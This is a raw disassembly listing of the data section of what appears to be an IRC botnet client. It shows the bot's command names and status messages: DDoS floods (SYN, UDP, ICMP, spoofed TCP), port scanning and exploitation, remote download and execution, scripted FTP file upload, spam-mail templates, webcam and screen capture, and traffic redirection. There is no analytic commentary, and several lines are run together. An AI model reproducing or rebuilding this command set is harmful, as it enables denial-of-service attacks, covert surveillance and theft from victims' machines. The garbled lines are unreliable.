dword_435DB0 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1+48A6�o
dd 2029671Fh, 2BBBB02h
aAmateurVideoSa db ' Amateur video saved to: %s.',0
align 4
dword_435DEC dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413EFF�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_1 db ' Invalid parameters for webcam capture.',0
align 4
dword_435E34 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413EF8�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_0 db ' Error while capturing from webcam.',0
align 4
dword_435E78 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1+47F7�o
dd 2029671Fh, 2BBBB02h
aWebcamCaptureS db ' Webcam capture saved to: %s.',0
align 4
aFrame db 'frame',0 ; DATA XREF: sub_40F6F1:loc_413E6C�o
align 4
dword_435EBC dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1+476E�o
dd 2029671Fh, 2BBBB02h
aDriverListComp db ' Driver list complete.',0
dword_435EF0 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1+4738�o
dd 2029671Fh, 2BBBB02h
aDriverDSS_ db ' Driver #%d - %s - %s.',0
aDrivers db 'drivers',0 ; DATA XREF: sub_40F6F1:loc_413DD5�o
dword_435F2C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413DC2�o
dd 2029671Fh, 2BBBB02h
aNoFilenameSpec db ' No filename specified for screen capture.',0
dword_435F74 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1:loc_413DBB�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_1 db ' Error while capturing screen.',0
dword_435FB0 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40F6F1+46BA�o
dd 2029671Fh, 2BBBB02h
aScreenCaptureS db ' Screen capture saved to: %s.',0
align 4
aScreen db 'screen',0 ; DATA XREF: sub_40F6F1:loc_413D72�o
align 4
dword_435FF4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4663�o
dd 2BBBB02h, 65472020h, 736F6874h, 25203A74h, 2E73h
dword_43601C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4628�o
dd 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 4
dword_43605C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+460C�o
dd 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 10h
dword_436090 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+458D�o
dd 2BBBB02h
aAliasAddedS_ db ' Alias added: %s.',0
align 4
dword_4360BC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4552�o
dd 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
dword_4360E8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+44FC�o
dd 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 4
dword_436114 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+4494�o
dd 2BBBB02h, 79432020h, 2E656C63h, 0
dword_436138 dd 54524150h, 0D732520h, 0Ah ; sub_40F6F1+50FC�o
dword_436144 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+442B�o
dd 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 10h
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40F6F1+441D�o
align 4
dword_43617C dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40F6F1+43F4�o
dd 2202967h, 2002BBBBh, 77615220h, 73252820h, 25203A29h
dd 73h
dword_4361A8 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40F6F1+4389�o
dd 2202967h, 2002BBBBh, 646F4D20h, 25282065h, 203A2973h
dd 7325h
dword_4361D4 dd 45444F4Dh, 732520hdword_4361DC dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40F6F1+42FF�o
dd 2202967h, 2002BBBBh, 63694E20h, 2528206Bh, 203A2973h
dd 7325h
dword_436208 dd 4B43494Eh, 732520h ; sub_40F6F1+4F43�o
dword_436210 dd 4E494F4Ah, 20732520h, 7325hdword_43621C dd 54524150h, 732520hdword_436224 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_4138FE�o
dd 2BBBB02h
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
align 4
dword_436268 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+41D6�o
dd 2BBBB02h, 65522020h, 74616570h, 7325203Ah, 0
aRepeat db 'repeat',0 ; DATA XREF: sub_40F6F1+4185�o
align 4
dword_436298 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_41382E�o
dd 2BBBB02h, 65442020h, 2E79616Ch, 0
dword_4362BC dd 25207325h, 73252073h, 73253A20h, 0 ; sub_40F6F1+41B0�o ...
unk_4362CC db 2 ; DATA XREF: sub_40F6F1:loc_41379D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
unk_436320 db 2 ; DATA XREF: sub_40F6F1+40A2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
unk_43636C db 2 ; DATA XREF: sub_40F6F1+4033�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40F6F1+3F8D�o
align 4
dword_4363B4 dd 7A026E02h, 201F6D1Fh, 65786528h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40F6F1+3F2B�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 3A73646Eh, 732520h
unk_4363DC db 2 ; DATA XREF: sub_40F6F1+3F20�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 65h, 78h, 65h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 10h
unk_436410 db 2 ; DATA XREF: sub_40F6F1+3E98�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_14 db ' Failed to start search thread, error: <%d>.',0
align 4
unk_43645C db 2 ; DATA XREF: sub_40F6F1+3E1E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingFor_0 db ' Searching for file: %s in: %s.',0
align 4
dword_43649C dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40F6F1:loc_413471�o
; sub_40F6F1:loc_414449�o
dd 0BBBB0220h, 2002h
unk_4364B8 db 2 ; DATA XREF: sub_40F6F1+3D68�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_4364EC db 2 ; DATA XREF: sub_40F6F1:loc_413437�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidFloodTi db ' Invalid flood time must be greater than 0.',0
align 4
unk_436534 db 2 ; DATA XREF: sub_40F6F1+3D3C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_43657C db 2 ; DATA XREF: sub_40F6F1+3CC2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSForSS db ' Flooding: (%s) for %s seconds.',0
align 4
unk_4365B8 db 2 ; DATA XREF: sub_40F6F1+3C4B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToSta_15 db ' Failed to start clone thread, error: <%d>.',0
unk_436600 db 2 ; DATA XREF: sub_40F6F1+3BDC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 10h
unk_436640 db 2 ; DATA XREF: sub_40F6F1+3B60�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_16 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_436688 db 2 ; DATA XREF: sub_40F6F1+3AE8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
align 4
dword_4366C8 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+3A67�o
dd 2BBBB02h
aFailedToSta_17 db ' Failed to start flood thread, error: <%d>.',0
align 10h
dword_436710 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+39EF�o
dd 2BBBB02h
aFloodingSSFo_0 db ' Flooding: (%s:%s) for %s seconds.',0
unk_43674C db 2 ; DATA XREF: sub_40F6F1+397F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
align 4
unk_43679C db 2 ; DATA XREF: sub_40F6F1+3910�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 4
unk_4367D8 db 2 ; DATA XREF: sub_40F6F1+3827�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_18 db ' Failed to start redirection thread, error: <%d>.',0
align 4
unk_43682C db 2 ; DATA XREF: sub_40F6F1+37BC�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTcpRedirectCre db ' TCP redirect created from: %s:%d to: %s:%d.',0
unk_436878 db 2 ; DATA XREF: sub_40F6F1+3731�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_19 db ' Failed to start scan thread, error: <%d>.',0
align 4
unk_4368C4 db 2 ; DATA XREF: sub_40F6F1+36C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_40F6F1+363E�o
align 10h
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40F6F1+3544�o
align 10h
dword_436930 dd 54434101h, 204E4F49h, 17325h ; sub_40F6F1+44DD�o
unk_43693C db 2 ; DATA XREF: sub_40F6F1+3457�o
; sub_40F6F1+53E9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_20 db ' Failed to start scan thread, error: <%d>.',0
align 4
unk_436984 db 2 ; DATA XREF: sub_40F6F1+33E8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSExploitationS db ' %s Exploitation started on %s:%d waiting %d seconds for %d minu'
db 'tes using %d threads.',0
aSequential db 'Sequential',0 ; DATA XREF: sub_40F6F1+33BD�o
; sub_40F6F1+534D�o
align 10h
aRandom_0 db 'Random',0 ; DATA XREF: sub_40F6F1+33B6�o
; sub_40F6F1+5346�o
align 4
unk_436A08 db 2 ; DATA XREF: sub_40F6F1+3278�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_21 db ' Failed to start scan, no IP specified.',0
align 4
unk_436A4C db 2 ; DATA XREF: sub_40F6F1+321B�o
; sub_40F6F1:loc_414B28�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_22 db ' Failed to start scan, port is invalid.',0
align 10h
unk_436A90 db 2 ; DATA XREF: sub_40F6F1+3129�o
; sub_40F6F1+519C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
dword_436ADC dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+30CE�o
dd 2BBBB02h
aFailedToSta_23 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_436B24 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+3063�o
dd 2BBBB02h
aSendingDPacket db ' Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40F6F1+2FAC�o
align 4
unk_436B94 db 2 ; DATA XREF: sub_40F6F1+2F97�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_24 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_436BDC db 2 ; DATA XREF: sub_40F6F1+2F28�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendingDPingsT db ' Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
dword_436C34 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_41256E�o
dd 2BBBB02h
aInvalidFlood_0 db ' Invalid flood time must be greater than 0.',0
align 4
dword_436C7C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2E73�o
dd 2BBBB02h
aFailedToSta_25 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_436CC4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2DF9�o
dd 2BBBB02h
aSSFloodingSSFo db ' %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_40F6F1+2DE9�o
align 10h
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40F6F1+2DE2�o
dword_436D18 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2D4D�o
dd 2BBBB02h
aInvalidFloodTy db ' Invalid flood type specified.',0
dword_436D50 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_412353�o
dd 2BBBB02h
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
dword_436D8C dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2C5B�o
dd 2BBBB02h
aUploadingFil_0 db ' Uploading file: %s to: %s',0
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40F6F1+2C44�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_40F6F1+2C2D�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40F6F1+2C0D�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_40F6F1+2BE9�o
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40F6F1+2BD8�o
align 4
dword_436E08 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1+2B62�o
dd 2BBBB02h
aFileNotFoundS_ db ' File not found: %s.',0
align 4
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_40F6F1+2B3F�o
align 4
aUtil_hcon db 'util.hcon',0 ; DATA XREF: sub_40F6F1+2B1C�o
align 10h
aUtil_httpcon db 'util.httpcon',0 ; DATA XREF: sub_40F6F1+2B05�o
align 10h
unk_436E60 db 3 ; DATA XREF: sub_40F6F1+2AE9�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 65h
db 6Dh ; m
db 61h, 69h, 6Ch
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5MessageSentTo db '5 Message sent to %s.',0
align 10h
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40F6F1+2A75�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a__0: ; DATA XREF: sub_40F6F1+29D9�o
unicode 0, <_>,0
aUtil_email db 'util.email',0 ; DATA XREF: sub_40F6F1+298A�o
align 4
aDdos_tcpf db 'ddos.tcpf',0 ; DATA XREF: sub_40F6F1+2973�o
align 4
aDdos_tcpflood db 'ddos.tcpflood',0 ; DATA XREF: sub_40F6F1+295C�o
align 4
aP: ; DATA XREF: sub_40F6F1+2945�o
unicode 0, <p>,0
aDdos_pingf db 'ddos.pingf',0 ; DATA XREF: sub_40F6F1+292E�o
align 4
aDdos_pingflood db 'ddos.pingflood',0 ; DATA XREF: sub_40F6F1+2917�o
align 4
aU: ; DATA XREF: sub_40F6F1+2900�o
unicode 0, <u>,0
aDdos_udpf db 'ddos.udpf',0 ; DATA XREF: sub_40F6F1+28E9�o
align 4
aDdos_udpflood db 'ddos.udpflood',0 ; DATA XREF: sub_40F6F1+28D2�o
align 4
aRoot_s db 'root.s',0 ; DATA XREF: sub_40F6F1+28BB�o
align 10h
aRoot_start db 'root.start',0 ; DATA XREF: sub_40F6F1+28A4�o
align 4
aClone_ac db 'clone.ac',0 ; DATA XREF: sub_40F6F1+287B�o
align 4
aClone_action db 'clone.action',0 ; DATA XREF: sub_40F6F1+2864�o
align 4
aClone_pm db 'clone.pm',0 ; DATA XREF: sub_40F6F1+284D�o
align 4
aClone_privmsg db 'clone.privmsg',0 ; DATA XREF: sub_40F6F1+2836�o
align 4
aRoot_ps db 'root.ps',0 ; DATA XREF: sub_40F6F1+281F�o
aRoot_portscan db 'root.portscan',0 ; DATA XREF: sub_40F6F1+2808�o
align 4
aDaemon_rd db 'daemon.rd',0 ; DATA XREF: sub_40F6F1+27F1�o
align 4
aDaemon_redirec db 'daemon.redirect',0 ; DATA XREF: sub_40F6F1+27DA�o
aDownload_wg33 db 'download.wg33',0 ; DATA XREF: sub_40F6F1+27C3�o
align 4
aDownload_wgett db 'download.wgett4m13',0 ; DATA XREF: sub_40F6F1+27AC�o
align 4
aDdos_synf db 'ddos.synf',0 ; DATA XREF: sub_40F6F1+2795�o
align 4
aDdos_synflood db 'ddos.synflood',0 ; DATA XREF: sub_40F6F1+277E�o
align 4
aClone_start db 'clone.start',0 ; DATA XREF: sub_40F6F1+2722�o
aClone_make db 'clone.make',0 ; DATA XREF: sub_40F6F1+270B�o
align 10h
aDdos_ic db 'ddos.ic',0 ; DATA XREF: sub_40F6F1+26E2�o
aDdos_icmp db 'ddos.icmp',0 ; DATA XREF: sub_40F6F1+26CB�o
align 4
aCom_mv db 'com.mv',0 ; DATA XREF: sub_40F6F1+26B4�o
align 4
aCom_rename db 'com.rename',0 ; DATA XREF: sub_40F6F1+269D�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_40F6F1+2686�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_40F6F1+266F�o
align 4
aCom_e db 'com.e',0 ; DATA XREF: sub_40F6F1+2658�o
align 10h
aCom_execute db 'com.execute',0 ; DATA XREF: sub_40F6F1+2641�o
aDownload_up33 db 'download.up33',0 ; DATA XREF: sub_40F6F1+262A�o
align 4
aDownload_updat db 'download.updat4m13',0 ; DATA XREF: sub_40F6F1+2613�o
align 10h
aIrc_de db 'irc.de',0 ; DATA XREF: sub_40F6F1+25FC�o
align 4
aIrc_delay db 'irc.delay',0 ; DATA XREF: sub_40F6F1+25E5�o
align 4
aIrc_rp db 'irc.rp',0 ; DATA XREF: sub_40F6F1+25CE�o
align 4
aIrc_repeat db 'irc.repeat',0 ; DATA XREF: sub_40F6F1+25B7�o
align 4
aClone_p db 'clone.p',0 ; DATA XREF: sub_40F6F1+25A0�o
aClone_part db 'clone.part',0 ; DATA XREF: sub_40F6F1+2589�o
align 4
aClone_j db 'clone.j',0 ; DATA XREF: sub_40F6F1+2572�o
aClone_join db 'clone.join',0 ; DATA XREF: sub_40F6F1+255B�o
align 10h
aClone_ni db 'clone.ni',0 ; DATA XREF: sub_40F6F1+2544�o
align 4
aClone_nick db 'clone.nick',0 ; DATA XREF: sub_40F6F1+252D�o
align 4
aClone_m db 'clone.m',0 ; DATA XREF: sub_40F6F1+2516�o
aClone_mode db 'clone.mode',0 ; DATA XREF: sub_40F6F1+24FF�o
align 4
aClone_ra db 'clone.ra',0 ; DATA XREF: sub_40F6F1+24E8�o
align 4
aClone_raw db 'clone.raw',0 ; DATA XREF: sub_40F6F1+24D1�o
align 4
aIrc_m db 'irc.m',0 ; DATA XREF: sub_40F6F1+24BA�o
align 4
aIrc_mode db 'irc.mode',0 ; DATA XREF: sub_40F6F1+24A3�o
align 4
aIrc_cy db 'irc.cy',0 ; DATA XREF: sub_40F6F1+248C�o
align 10h
aIrc_cycle db 'irc.cycle',0 ; DATA XREF: sub_40F6F1+2475�o
align 4
aIrc_ac db 'irc.ac',0 ; DATA XREF: sub_40F6F1+245E�o
align 4
aIrc_action db 'irc.action',0 ; DATA XREF: sub_40F6F1+2447�o
align 10h
aIrc_pm db 'irc.pm',0 ; DATA XREF: sub_40F6F1+2430�o
align 4
aIrc_privmsg db 'irc.privmsg',0 ; DATA XREF: sub_40F6F1+2419�o
aIrc_aa db 'irc.aa',0 ; DATA XREF: sub_40F6F1+2402�o
align 4
aIrc_addalias db 'irc.addalias',0 ; DATA XREF: sub_40F6F1+23EB�o
align 4
aIrc_gh db 'irc.gh',0 ; DATA XREF: sub_40F6F1+23C2�o
align 4
aIrc_gethost db 'irc.gethost',0 ; DATA XREF: sub_40F6F1+23AB�o
aCom_cap db 'com.cap',0 ; DATA XREF: sub_40F6F1+2394�o
aCom_capture db 'com.capture',0 ; DATA XREF: sub_40F6F1+237D�o
dword_4371C4 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40F6F1:loc_411A20�o
dd 2BBBB02h
aCommandUnknown db ' Command unknown.',0
align 10h
